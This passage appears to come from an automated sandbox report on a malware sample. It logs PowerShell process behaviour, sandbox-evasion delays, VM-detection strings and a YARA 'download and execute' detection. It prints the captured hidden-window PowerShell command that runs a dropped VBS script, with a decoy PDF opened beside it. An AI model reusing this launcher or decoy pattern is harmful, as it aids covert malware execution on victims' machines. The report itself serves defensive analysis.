      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5137Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4513Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6502Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3202Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7216Thread sleep time: -10145709240540247s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep count: 6502 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep count: 3202 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -6456360425798339s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 3036Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: V# KoZIhvcNAQELBQAwTDEgMB4MSFT_NetEventVmNetworkAdatper.format.ps1xmlkdsb
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
      Source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FUy9M7dg+MZOuvCaKNyAMgkPE6MSFT_NetEventVmNetworkAdatper.cdxmlWEW
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 0000000C.00000002.2518239270.00000250DD041000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2518330430.00000250DD053000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2516452433.00000250D7A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000008.00000002.1330629273.0000021EDA49B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000005.00000002.1590508240.0000028A669C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7804.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7804, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
